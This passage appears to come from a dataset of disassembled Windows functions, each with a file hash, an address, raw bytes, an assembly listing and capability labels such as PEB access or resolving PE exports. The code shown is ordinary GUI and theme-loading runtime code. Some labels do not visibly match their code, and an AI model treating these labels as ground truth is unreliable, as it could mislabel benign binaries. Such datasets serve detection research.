"mov edx, dword [ebp - 0xc]",
"mov dword [edx + 0x3c], eax",
"jmp 0x4eb0d8",
"mov dword [ebp - 0x20], 0xffffffff",
"nop",
"mov eax, dword [ebp - 0x20]",
"lea eax, [eax + 1]",
"mov dword [ebp - 0x20], eax",
"mov eax, dword [ebp - 0xc]",
"mov edx, dword [ebp - 0x20]",
"mov dword [eax + edx*4 + 0x30], 0",
"cmp dword [ebp - 0x20], 3",
"jae 0x4eb07f",
"jmp 0x4eb060",
"mov eax, dword [ebp - 0xc]",
"cmp dword [eax + 0xc0], 0",
"je 0x4eb08d",
"jmp 0x4eb0d8",
"mov eax, dword [ebp - 0xc]",
"cmp dword [eax + 0xc4], 0",
"je 0x4eb09b",
"jmp 0x4eb0d8",
"mov eax, dword [ebp - 0xc]",
"mov eax, dword [eax + 8]",
"mov eax, dword [eax + 0x214]",
"lea edx, [ebp - 0x40]",
"mov ecx, dword [ebp - 0xc]",
"mov ecx, dword [ecx + 8]",
"mov ecx, dword [ecx + 0x214]",
"mov ecx, dword [ecx]",
"call dword [ecx + 0x160]",
"mov edx, dword [ebp - 0xc]",
"mov eax, dword [ebp - 0x38]",
"mov dword [edx + 0xc0], eax",
"mov edx, dword [ebp - 0xc]",
"mov eax, dword [ebp - 0x34]",
"mov dword [edx + 0xc4], eax",
"mov esi, esi",
"mov dword [ebp - 0x44], 1",
"cmp dword [ebp - 0xc], 0",
"jne 0x4eb0e7",
"jmp 0x4eb0fc",
"cmp dword [ebp - 8], 0",
"jne 0x4eb0ef",
"jmp 0x4eb0fc",
"mov eax, dword [ebp - 0xc]",
"mov edx, dword [ebp - 0xc]",
"mov edx, dword [edx]",
"call dword [edx + 0x44]",
"mov esi, esi",
"xor eax, eax",
"pop edx",
"add esp, 0xc",
"mov dword fs:[eax], edx",
"jmp 0x4eb12a",
"mov eax, dword [ebp - 0xc]",
"pop edi",
"pop esi",
"pop ebx",
"mov esp, ebp",
"pop ebp",
"ret 4"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x509330
|
[
"Access peb ldr_data",
"Get kernel32 base address"
] |
5589e58d6424f05356578945f48955f8894dfc837df8017402eb0d8b45f48b55f4ff52348945f490837df4007402eb08e9b500000031c068f793500055682046410064ff30648920c745f0ffffffff8b45f4ba00000000e8313bf0ff8b55f48b45fc89420c8b45f4c74020000000008b45f4c74014000000008b45f4c74018000000008b45f4c74030000000008b45f4c7403400000000c745f001000000837df4007502eb13837df8007502eb0b8b45f48b55f48b12ff524431c05a83c40c648910eb238b45f45f5e5b89ec5dc3
|
[
"push ebp",
"mov ebp, esp",
"lea esp, [esp - 0x10]",
"push ebx",
"push esi",
"push edi",
"mov dword [ebp - 0xc], eax",
"mov dword [ebp - 8], edx",
"mov dword [ebp - 4], ecx",
"cmp dword [ebp - 8], 1",
"je 0x50934b",
"jmp 0x509358",
"mov eax, dword [ebp - 0xc]",
"mov edx, dword [ebp - 0xc]",
"call dword [edx + 0x34]",
"mov dword [ebp - 0xc], eax",
"nop",
"cmp dword [ebp - 0xc], 0",
"je 0x509360",
"jmp 0x509368",
"jmp 0x50941a",
"xor eax, eax",
"push 0x5093f7",
"push ebp",
"push 0x414620",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"mov dword [ebp - 0x10], 0xffffffff",
"mov eax, dword [ebp - 0xc]",
"mov edx, 0",
"call fcn.0040cec0",
"mov edx, dword [ebp - 0xc]",
"mov eax, dword [ebp - 4]",
"mov dword [edx + 0xc], eax",
"mov eax, dword [ebp - 0xc]",
"mov dword [eax + 0x20], 0",
"mov eax, dword [ebp - 0xc]",
"mov dword [eax + 0x14], 0",
"mov eax, dword [ebp - 0xc]",
"mov dword [eax + 0x18], 0",
"mov eax, dword [ebp - 0xc]",
"mov dword [eax + 0x30], 0",
"mov eax, dword [ebp - 0xc]",
"mov dword [eax + 0x34], 0",
"mov dword [ebp - 0x10], 1",
"cmp dword [ebp - 0xc], 0",
"jne 0x5093d9",
"jmp 0x5093ec",
"cmp dword [ebp - 8], 0",
"jne 0x5093e1",
"jmp 0x5093ec",
"mov eax, dword [ebp - 0xc]",
"mov edx, dword [ebp - 0xc]",
"mov edx, dword [edx]",
"call dword [edx + 0x44]",
"xor eax, eax",
"pop edx",
"add esp, 0xc",
"mov dword fs:[eax], edx",
"jmp 0x50941a",
"mov eax, dword [ebp - 0xc]",
"pop edi",
"pop esi",
"pop ebx",
"mov esp, ebp",
"pop ebp",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x54bf10
|
[
"Get graphical window text"
] |
5589e58d6424e88945fc8955f8c745f000000000c745e80000000031c068f0be54005568a042410064ff30648920ff75fce83a5cebff8945f48b55f48d45f0e8ece7ebff837df4007f02eb208b45f48d4001508b45f085c07505b8f0425d0050ff75fce8f85bebff8945f4908b55f48d45f0e8b9e7ebff8b45f08d55e8e8eeeeebff8b45e88945ec8b4df88b55ec85d274038b52fc8b45ec85c07505b8f0425d00e83a11eeff8b45f831c05a83c40c64891089e8e827ffffff89ec5dc3
|
[
"push ebp",
"mov ebp, esp",
"lea esp, [esp - 0x18]",
"mov dword [ebp - 4], eax",
"mov dword [ebp - 8], edx",
"mov dword [ebp - 0x10], 0",
"mov dword [ebp - 0x18], 0",
"xor eax, eax",
"push fcn.0054bef0",
"push ebp",
"push 0x4142a0",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"push dword [ebp - 4]",
"call sub.user32.dll_GetWindowTextLengthW",
"mov dword [ebp - 0xc], eax",
"mov edx, dword [ebp - 0xc]",
"lea eax, [ebp - 0x10]",
"call fcn.0040a740",
"cmp dword [ebp - 0xc], 0",
"jg 0x54bf5c",
"jmp 0x54bf7c",
"mov eax, dword [ebp - 0xc]",
"lea eax, [eax + 1]",
"push eax",
"mov eax, dword [ebp - 0x10]",
"test eax, eax",
"jne 0x54bf6f",
"mov eax, 0x5d42f0",
"push eax",
"push dword [ebp - 4]",
"call sub.user32.dll_GetWindowTextW",
"mov dword [ebp - 0xc], eax",
"nop",
"mov edx, dword [ebp - 0xc]",
"lea eax, [ebp - 0x10]",
"call fcn.0040a740",
"mov eax, dword [ebp - 0x10]",
"lea edx, [ebp - 0x18]",
"call fcn.0040ae80",
"mov eax, dword [ebp - 0x18]",
"mov dword [ebp - 0x14], eax",
"mov ecx, dword [ebp - 8]",
"mov edx, dword [ebp - 0x14]",
"test edx, edx",
"je 0x54bfa5",
"mov edx, dword [edx - 4]",
"mov eax, dword [ebp - 0x14]",
"test eax, eax",
"jne 0x54bfb1",
"mov eax, 0x5d42f0",
"call fcn.0042d0f0",
"mov eax, dword [ebp - 8]",
"xor eax, eax",
"pop edx",
"add esp, 0xc",
"mov dword fs:[eax], edx",
"mov eax, ebp",
"call fcn.0054bef0",
"mov esp, ebp",
"pop ebp",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x54d5f0
|
[
"Access peb ldr_data"
] |
5589e58d6424f08945fc8955f8894df48b45f4bae09e5c00e8c30fecffc745f00000000031c068e0d554005568a042410064ff306489208b45f4c74008000000008b45f4c700000000008b45f48d4034ba00000000e876b3ebff8b45f4baa0a74d0089502c8b55f48b45f88b40048942248b55f48b45f88b40088942288b55f48b45f88b401c8942048b45f88b008d4df066ba0000e886bcebff8b55f08b45f48d4030e828b3ebff8b55f48b45f88b400c89420c8b55f48b45f88b40108942108b55f48b45f88b40148942188b55f48b45f88b40188942148b45f48d48108b45f48d500c8b45fce8a4deffff8b55f48b45fce8990500008b45fcf74028100000007402eb1f8b45fce8d3f4faff84c07402eb118b45f48b40240d000000088b55f489422431c05a83c40c64891089e8e8bcfeffff89ec5dc3
|
[
"push ebp",
"mov ebp, esp",
"lea esp, [esp - 0x10]",
"mov dword [ebp - 4], eax",
"mov dword [ebp - 8], edx",
"mov dword [ebp - 0xc], ecx",
"mov eax, dword [ebp - 0xc]",
"mov edx, 0x5c9ee0",
"call fcn.0040e5d0",
"mov dword [ebp - 0x10], 0",
"xor eax, eax",
"push fcn.0054d5e0",
"push ebp",
"push 0x4142a0",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"mov eax, dword [ebp - 0xc]",
"mov dword [eax + 8], 0",
"mov eax, dword [ebp - 0xc]",
"mov dword [eax], 0",
"mov eax, dword [ebp - 0xc]",
"lea eax, [eax + 0x34]",
"mov edx, 0",
"call fcn.004089c0",
"mov eax, dword [ebp - 0xc]",
"mov edx, fcn.004da7a0",
"mov dword [eax + 0x2c], edx",
"mov edx, dword [ebp - 0xc]",
"mov eax, dword [ebp - 8]",
"mov eax, dword [eax + 4]",
"mov dword [edx + 0x24], eax",
"mov edx, dword [ebp - 0xc]",
"mov eax, dword [ebp - 8]",
"mov eax, dword [eax + 8]",
"mov dword [edx + 0x28], eax",
"mov edx, dword [ebp - 0xc]",
"mov eax, dword [ebp - 8]",
"mov eax, dword [eax + 0x1c]",
"mov dword [edx + 4], eax",
"mov eax, dword [ebp - 8]",
"mov eax, dword [eax]",
"lea ecx, [ebp - 0x10]",
"mov dx, 0",
"call fcn.00409310",
"mov edx, dword [ebp - 0x10]",
"mov eax, dword [ebp - 0xc]",
"lea eax, [eax + 0x30]",
"call fcn.004089c0",
"mov edx, dword [ebp - 0xc]",
"mov eax, dword [ebp - 8]",
"mov eax, dword [eax + 0xc]",
"mov dword [edx + 0xc], eax",
"mov edx, dword [ebp - 0xc]",
"mov eax, dword [ebp - 8]",
"mov eax, dword [eax + 0x10]",
"mov dword [edx + 0x10], eax",
"mov edx, dword [ebp - 0xc]",
"mov eax, dword [ebp - 8]",
"mov eax, dword [eax + 0x14]",
"mov dword [edx + 0x18], eax",
"mov edx, dword [ebp - 0xc]",
"mov eax, dword [ebp - 8]",
"mov eax, dword [eax + 0x18]",
"mov dword [edx + 0x14], eax",
"mov eax, dword [ebp - 0xc]",
"lea ecx, [eax + 0x10]",
"mov eax, dword [ebp - 0xc]",
"lea edx, [eax + 0xc]",
"mov eax, dword [ebp - 4]",
"call fcn.0054b580",
"mov edx, dword [ebp - 0xc]",
"mov eax, dword [ebp - 4]",
"call fcn.0054dc80",
"mov eax, dword [ebp - 4]",
"test dword [eax + 0x28], 0x10",
"je 0x54d6f5",
"jmp 0x54d714",
"mov eax, dword [ebp - 4]",
"call fcn.004fcbd0",
"test al, al",
"je 0x54d703",
"jmp 0x54d714",
"mov eax, dword [ebp - 0xc]",
"mov eax, dword [eax + 0x24]",
"or eax, 0x8000000",
"mov edx, dword [ebp - 0xc]",
"mov dword [edx + 0x24], eax",
"xor eax, eax",
"pop edx",
"add esp, 0xc",
"mov dword fs:[eax], edx",
"mov eax, ebp",
"call fcn.0054d5e0",
"mov esp, ebp",
"pop ebp",
"ret"
] |
f520ad542c1d1bea2fa0fdc7dbcdc7c74afbe047bbf701893fe4b455d5321c6a
|
0x561b10
|
[
"Link many functions at runtime"
] |
5589e58d6424fc31c068001b56005568a042410064ff306489208305f0955d0001833de0955d00000f855e060000b838165d0050e827f6e9ffa3e0955d0085c00f8646060000b844165d0050ff35e0955d00e819f6e9ffa380915d00b854165d0050ff35e0955d00e803f6e9ffa3a0915d00b864165d0050ff35e0955d00e8edf5e9ffa3b0915d00b878165d0050ff35e0955d00e8d7f5e9ffa3d0915d00b888165d0050ff35e0955d00e8c1f5e9ffa3e0915d00b8a8165d0050ff35e0955d00e8abf5e9ffa3f0915d00b8c4165d0050ff35e0955d00e895f5e9ffa310925d00b8d8165d0050ff35e0955d00e87ff5e9ffa320925d00b8ec165d0050ff35e0955d00e869f5e9ffa330925d00b800175d0050ff35e0955d00e853f5e9ffa300925d00b81c175d0050ff35e0955d00e83df5e9ffa340925d00b834175d0050ff35e0955d00e827f5e9ffa350925d00b844175d0050ff35e0955d00e811f5e9ffa360925d00b854175d0050ff35e0955d00e8fbf4e9ffa370925d00b868175d0050ff35e0955d00e8e5f4e9ffa380925d00b890175d0050ff35e0955d00e8cff4e9ffa390925d00b8a0175d0050ff35e0955d00e8b9f4e9ffa3a0925d00b8b0175d0050ff35e0955d00e8a3f4e9ffa3b0925d00b8c0175d0050ff35e0955d00e88df4e9ffa3c0925d00b8d0175d0050ff35e0955d00e877f4e9ffa3d0925d00b8dc175d0050ff35e0955d00e861f4e9ffa3e0925d00b8f0175d0050ff35e0955d00e84bf4e9ffa3f0925d00b804185d0050ff35e0955d00e835f4e9ffa300935d00b814185d0050ff35e0955d00e81ff4e9ffa310935d00b824185d0050ff35e0955d00e809f4e9ffa320935d00b834185d0050ff35e0955d00e8f3f3e9ffa330935d00b844185d0050ff35e0955d00e8ddf3e9ffa340935d00b85c185d0050ff35e0955d00e8c7f3e9ffa350935d00b86c185d0050ff35e0955d00e8b1f3e9ffa360935d00b880185d0050ff35e0955d00e89bf3e9ffa370935d00b894185d0050ff35e0955d00e885f3e9ffa380935d00b8ac185d0050ff35e0955d00e86ff3e9ffa390935d00b8bc185d0050ff35e0955d00e859f3e9ffa3a0935d00b8cc185d0050ff35e0955d00e843f3e9ffa3b0935d00b8dc185d0050ff35e0955d00e82df3e9ffa3c0935d00b8f0185d0050ff35e0955d00e817f3e9ffa3d0935d00b800195d0050ff35e0955d00e801f3e9ffa3e0935d00b810195d0050ff35e0955d00e8ebf2e9ffa3f0935d00b81c195d0050ff35e0955d00e8d5f2e9ffa300945d00b82c195d0050ff35e0955d00e8bff2e9ffa310945d00b848195d0050ff35e0955d00e8a9f2e9ffa320945d00b864195d0050ff35e0955d00e893f2e9ffa330945d00b87c195d0050ff35e0955d00e87df2e9ffa340945d00b894195d0050ff35e0955d00e867f2e9ffa350945d00b8a8195d0050ff35e0955d00e851f2e9ffa360945d00b8c8195d0050ff35e0955d00e83bf2e9ffa370945d00b8e4195d0050ff35e0955d00e825f2e9ffa380945d00b8f4195d0050ff35e0955d00e80ff2e9ffa390915d00b8041a5d0050ff35e0955d00e8f9f1e9ffa3c0915d00b81c1a5d0050ff35e0955d00e8e3f1e9ffa390945d00b8381a5d0050ff35e0955d00e8cdf1e9ffa3a0945d00b8501a5d0050ff35e0955d00e8b7f1e9ffa3b0945d00b8601a5d0050ff35e0955d00e8a1f1e9ffa3c0945d00b8701a5d0050ff35e0955d00e88bf1e9ffa3d0945d00b8801a5d0050ff35e0955d00e875f1e9ffa3e0945d00b8941a5d0050ff35e0955d00e85ff1e9ffa3f0945d00b8a81a5d0050ff35e0955d00e849f1e9ffa300955d00b8bc1a5d0050ff35e0955d00e833f1e9ffa310955d00b8d01a5d0050ff35e0955d00e81df1e9ffa320955d00b8ec1a5d0050ff35e0955d00e807f1e9ffa330955d00b8081b5d0050ff35e0955d00e8f1f0e9ffa340955d00b81c1b5d0050ff35e0955d00e8dbf0e9ffa350955d00b8341b5d0050ff35e0955d00e8c5f0e9ffa360955d00b8481b5d0050ff35e0955d00e8aff0e9ffa370955d00b8601b5d0050ff35e0955d00e899f0e9ffa380955d00b8801b5d0050ff35e0955d00e883f0e9ffa390955d00b8981b5d0050ff35e0955d00e86df0e9ffa3a0955d00b8b01b5d0050ff35e0955d00e857f0e9ffa3b0955d00b8d01b5d0050ff35e0955d00e841f0e9ffa3c0955d00b8e41b5d0050ff35e0955d00e82bf0e9ffa3d0955d00b8001c5d0050ff35e0955d00e815f0e9ffa350915d00b8181c5d0050ff35e0955d00e8ffefe9ffa360915d00b8301c5d0050ff35e0955d00e8e9efe9ffa370915d00833de0955d00000f9745fc31c05a83c40c64891089e8e849f9ffff8a45fc89ec5dc3
|
[
"push ebp",
"mov ebp, esp",
"lea esp, [esp - 4]",
"xor eax, eax",
"push fcn.00561b00",
"push ebp",
"push 0x4142a0",
"push dword fs:[eax]",
"mov dword fs:[eax], esp",
"add dword [0x5d95f0], 1",
"cmp dword [0x5d95e0], 0",
"jne 0x56219c",
"mov eax, str.uxtheme.dll",
"push eax",
"call sub.kernel32.dll_LoadLibraryA",
"mov dword [0x5d95e0], eax",
"test eax, eax",
"jbe 0x56219c",
"mov eax, str.OpenThemeData",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9180], eax",
"mov eax, str.CloseThemeData",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d91a0], eax",
"mov eax, str.DrawThemeBackground",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d91b0], eax",
"mov eax, str.DrawThemeText",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d91d0], eax",
"mov eax, str.GetThemeBackgroundContentRect",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d91e0], eax",
"mov eax, str.GetThemeBackgroundExtent",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d91f0], eax",
"mov eax, str.GetThemePartSize",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9210], eax",
"mov eax, str.GetThemeTextExtent",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9220], eax",
"mov eax, str.GetThemeTextMetrics",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9230], eax",
"mov eax, str.GetThemeBackgroundRegion",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9200], eax",
"mov eax, str.HitTestThemeBackground",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9240], eax",
"mov eax, str.DrawThemeEdge",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9250], eax",
"mov eax, str.DrawThemeIcon",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9260], eax",
"mov eax, str.IsThemePartDefined",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9270], eax",
"mov eax, str.IsThemeBackgroundPartiallyTransparent",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9280], eax",
"mov eax, str.GetThemeColor",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9290], eax",
"mov eax, str.GetThemeMetric",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d92a0], eax",
"mov eax, str.GetThemeString",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d92b0], eax",
"mov eax, str.GetThemeBool",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d92c0], eax",
"mov eax, str.GetThemeInt",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d92d0], eax",
"mov eax, str.GetThemeEnumValue",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d92e0], eax",
"mov eax, str.GetThemePosition",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d92f0], eax",
"mov eax, str.GetThemeFont",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9300], eax",
"mov eax, str.GetThemeRect",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9310], eax",
"mov eax, str.GetThemeMargins",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9320], eax",
"mov eax, str.GetThemeIntList",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9330], eax",
"mov eax, str.GetThemePropertyOrigin",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9340], eax",
"mov eax, str.SetWindowTheme",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9350], eax",
"mov eax, str.GetThemeFilename",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9360], eax",
"mov eax, str.GetThemeSysColor",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9370], eax",
"mov eax, str.GetThemeSysColorBrush",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9380], eax",
"mov eax, str.GetThemeSysBool",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9390], eax",
"mov eax, str.GetThemeSysSize",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d93a0], eax",
"mov eax, str.GetThemeSysFont",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d93b0], eax",
"mov eax, str.GetThemeSysString",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d93c0], eax",
"mov eax, str.GetThemeSysInt",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d93d0], eax",
"mov eax, str.IsThemeActive",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d93e0], eax",
"mov eax, str.IsAppThemed",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d93f0], eax",
"mov eax, str.GetWindowTheme",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9400], eax",
"mov eax, str.EnableThemeDialogTexture",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9410], eax",
"mov eax, str.IsThemeDialogTextureEnabled",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9420], eax",
"mov eax, str.GetThemeAppProperties",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9430], eax",
"mov eax, str.SetThemeAppProperties",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9440], eax",
"mov eax, str.GetCurrentThemeName",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9450], eax",
"mov eax, str.GetThemeDocumentationProperty",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9460], eax",
"mov eax, str.DrawThemeParentBackground",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9470], eax",
"mov eax, str.EnableTheming",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9480], eax",
"mov eax, str.OpenThemeDataEx",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9190], eax",
"mov eax, str.DrawThemeBackgroundEx",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d91c0], eax",
"mov eax, str.DrawThemeParentBackgroundEx",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9490], eax",
"mov eax, str.SetWindowThemeAttribute",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d94a0], eax",
"mov eax, str.DrawThemeTextEx",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d94b0], eax",
"mov eax, str.GetThemeBitmap",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d94c0], eax",
"mov eax, str.GetThemeStream",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d94d0], eax",
"mov eax, str.BufferedPaintInit",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d94e0], eax",
"mov eax, str.BufferedPaintUnInit",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d94f0], eax",
"mov eax, str.BeginBufferedPaint",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9500], eax",
"mov eax, str.EndBufferedPaint",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9510], eax",
"mov eax, str.GetBufferedPaintTargetRect",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9520], eax",
"mov eax, str.GetBufferedPaintTargetDC",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9530], eax",
"mov eax, str.GetBufferedPaintDC",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9540], eax",
"mov eax, str.GetBufferedPaintBits",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9550], eax",
"mov eax, str.BufferedPaintClear",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9560], eax",
"mov eax, str.BufferedPaintSetAlpha",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9570], eax",
"mov eax, str.BufferedPaintStopAllAnimations",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9580], eax",
"mov eax, str.BeginBufferedAnimation",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9590], eax",
"mov eax, str.EndBufferedAnimation",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d95a0], eax",
"mov eax, str.BufferedPaintRenderAnimation",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d95b0], eax",
"mov eax, str.IsCompositionActive",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d95c0], eax",
"mov eax, str.GetThemeTransitionDuration",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d95d0], eax",
"mov eax, str.BeginPanningFeedback",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9150], eax",
"mov eax, str.UpdatePanningFeedback",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9160], eax",
"mov eax, str.EndPanningFeedback",
"push eax",
"push dword [0x5d95e0]",
"call sub.kernel32.dll_GetProcAddress",
"mov dword [0x5d9170], eax",
"cmp dword [0x5d95e0], 0",
"seta byte [ebp - 4]",
"xor eax, eax",
"pop edx",
"add esp, 0xc",
"mov dword fs:[eax], edx",
"mov eax, ebp",
"call fcn.00561b00",
"mov al, byte [ebp - 4]",
"mov esp, ebp",
"pop ebp",
"ret"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x419160
|
[
"Resolve function by parsing pe exports"
] |
6aff6870854b0064a100000000506489250000000083ec508b4c246833c03bc88944243c89442438894424488944244c89442440894424440f84000300008d44243850518b4c246c51e82229020083f8010f85e70200008b54246053558b6c247456578b45008b5d088b75048b4d0c2bd82bce83ea00895c2410894c24748bf80f84210200004a0f844d0100004a0f859c0200008b4424788b68048b40083beb896c2470894424788944247c7f118bc38bdd2bc5895c2410992bc2d1f803f88b5424783bd17f158bc12bc2992bc28b542478d1f803f0895424748bca3beb7f06394c24787e65db442470db442410d8f1db442478dd542418db442474d8f1dd5c2410ddd8dc542410dfe0f6c4017506ddd8dd442410d9c9d8c9e8ca000700dd442418d8c98be8e8bd0007008bc88bc32bc5894c247c99ddd82bc2d1f803f88b4424742bc1992bc2d1f803f08b44247c682000cc005055568d4c24585751e86e2a02008b9c248400000085db0f84bf010000c744241400000000c7442410fc474e008b54247c03ef03d6c74424680200000052555657ff158cf04b00508d4c2414e83ca409008b6c24148b4b048d4424106a04f7d81bc023c5505151ff1588f04b00c7442410083a4e00c7442468030000008d4c2410e95101000003ce3bf10f8daf0000008b4c24508bf88d14183bfa0f8d870000008b44245403cf03c65051568d4c24445751ff15c8f54b008b9424800000008d442438528d4c241c5051ff15ccf54b008b44241c8b5424188b4c24208944242c895424288b5424248d442428894c24305089542438ff150cf64b0085c07515682000cc006aff6aff568d4c24585751e8682902008b45008b4c245003f98d14183bfa0f8c79ffffff8b5424548b7c247403f28b550403d73bf20f8c55ffffff8b8c248400000085c90f848e000000e984000000682000cc006aff6aff568d4424585750e8142902008b9c248400000033c03bd8746789442414c7442410fc474e008b4c24548b542450894424688d04318d0c3